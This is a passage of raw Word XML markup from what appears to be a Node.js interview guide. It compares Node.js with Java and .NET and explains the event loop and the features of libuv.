      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Performance Characteristics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F142F39" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746484A8" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js excels in handling a large number of concurrent connections and I/O-bound operations due to its non-blocking, event-driven architecture. However, being single-threaded, Node.js may not be the best choice for CPU-intensive operations like heavy data processing or large computations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F42110C" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Other Technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3494E87B" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Multi-threaded platforms like Java or .NET may outperform Node.js in CPU-bound tasks due to their ability to leverage multiple cores more effectively. Languages like Java also have mature garbage collection and JIT (Just-In-Time) compilation, contributing to consistent performance in long-running applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA77878" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. Learning Curve and Developer Productivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C57FDD" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C72D2F" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js is relatively easy to learn for developers familiar with JavaScript, making it accessible for front-end developers transitioning to back-end development. Its lightweight nature and the use of a single language across the stack can boost productivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111D2D22" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Other Technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275928A7" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Traditional server-side technologies often require knowledge of multiple languages and frameworks. For example, a developer working with a Java-based stack might need to learn Java for the server-side, SQL for database interactions, and HTML/CSS/JavaScript for the front-end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22794418" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8. Use Cases and Suitability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213613C1" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A08E15" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best suited for real-time applications, single-page applications (SPAs), RESTful APIs, microservices, and applications with a lot of I/O operations (e.g., chat applications, dashboards, IoT applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54779398" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Other Technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2909F8E7" w14:textId="636F35B3" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Platforms like Java or .NET are often chosen for enterprise-level applications, large-scale monolithic systems, or applications that require heavy CPU processing, such as financial systems or large-scale enterprise resource planning (ERP) systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1295F316"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3" w:name="_Toc178383186"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q3. What is an event loop in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="0353409A" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>libuv</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a multi-platform support library primarily used by Node.js to provide asynchronous I/O operations. It is the backbone of Node.js’s event-driven architecture and is responsible for handling non-blocking operations, such as file system interactions, network requests, timers, and more. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>libuv</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a key component that allows Node.js to perform efficiently even with a single-threaded event loop, supporting high concurrency and non-blocking I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE1F717" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Features of libuv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D0E81B" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67650782" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>At the heart of libuv is the event loop, which manages and schedules tasks, including I/O operations, timers, and callbacks. The event loop is responsible for picking up tasks, executing them, and then moving on to the next task, ensuring non-blocking and asynchronous behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DDECCE" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Thread Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D267DD" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Although Node.js is single-threaded for JavaScript execution, libuv uses a thread pool (usually with 4 threads) for performing certain blocking operations, such as file system tasks or DNS lookups. This allows Node.js to offload these operations to separate threads, avoiding blocking the main event loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE758A2" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cross-Platform Abstraction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29402667" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>libuv provides a consistent API across different operating systems, including Linux, macOS, and Windows. This abstraction layer allows Node.js to run seamlessly on various platforms without needing to worry about platform-specific I/O implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0E184F" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Asynchronous I/O:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C74ED7" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>libuv provides a consistent interface for performing non-blocking I/O operations, such as reading and writing to files, handling TCP/UDP networking, and managing pipes. These operations are handled asynchronously, allowing the application to continue running without waiting for I/O tasks to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3928542A" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Timers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B31A2BA" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>libuv manages timers in Node.js, allowing you to set up functions to execute after a certain delay (e.g., setTimeout, setInterval). The event loop periodically checks if any timers are due and executes their callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3CA0C0" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>File System Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF9DCC" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>File operations like reading, writing, and modifying files are offloaded to the thread pool managed by libuv. This ensures that these potentially blocking operations do not interfere with the main event loop's responsiveness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D856FDA" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Networking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6320E8BE" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
